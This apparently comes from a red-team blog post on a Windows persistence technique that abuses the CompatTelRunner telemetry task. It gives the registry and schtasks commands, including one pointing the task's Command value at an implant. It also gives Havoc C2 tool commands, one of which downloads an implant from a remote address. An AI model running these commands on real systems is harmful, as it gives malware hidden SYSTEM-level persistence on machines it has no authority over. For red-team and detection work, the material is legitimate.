Microsoft has introduced the compatibility telemetry in order to collect usage and performance data about Windows systems. The telemetry tasks are collected via the binary “CompatTelRunner.exe” which is stored in the following location:

C:\Windows\System32

CompatTelRunner executes a variety of commands which are retrieved from specific registry keys. TrustedSec has identified that it is feasible to abuse the Windows telemetry mechanism for persistence during red team operations if elevated access has been achieved.

The persistence method requires the following steps:

  1. Creation of a registry subkey under the “TelemetryController” key
  2. Creation of “Command” key that will execute the arbitrary command or implant
  3. Creation of “DWORD” key set to Nightly with the data value set to “1”
  4. Execution of the “Microsoft Compatibility Appraiser” schedule task via the schtasks binary

The above methodology can be achieved by executing the following commands from the command line:

reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Command /t REG_SZ /d "C:\Users\Peter\Downloads\demon.x64.exe"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Nightly /t REG_DWORD /d 1
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
Windows Telemetry Persistence – Command Prompt

Execution of the above commands will result the following modifications to the registry as displayed below:

Windows Telemetry Persistence – Registry

Establishing persistence via Windows Telemetry can be achieved from an elevated implant session.

Windows Telemetry Persistence – Havoc C2 Implant

The telemetry is a C# binary which implements the persistence method by enabling red teams to use a local path in order to run an arbitrary payload.

shell telemetry.exe install /path:C:\Users\peter\Downloads\demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Local Install

Alternatively, telemetry can be used to download an implant from a remote location to disk.

shell telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Remote Download

Upon execution the tool will create the required registry structure as displayed in the image below:

Windows Telemetry Persistence – Registry Telemetry

The implant will be executed under the context of “CompatTelRunner.exe” process.

Windows Telemetry Persistence – Implant

The schedule task is configured to run the “CompatTelRunner.exe” binary with SYSTEM level privileges and therefore the implant will executed with similar privileges.

Windows Telemetry Persistence – C2 Sessions

This could be verified by executing the “whoami” command.

Windows Telemetry Persistence – whoami

The following image displays the active sessions in the compromised host.

Windows Telemetry Persistence – Havoc C2 Session Graph

References

Leave a comment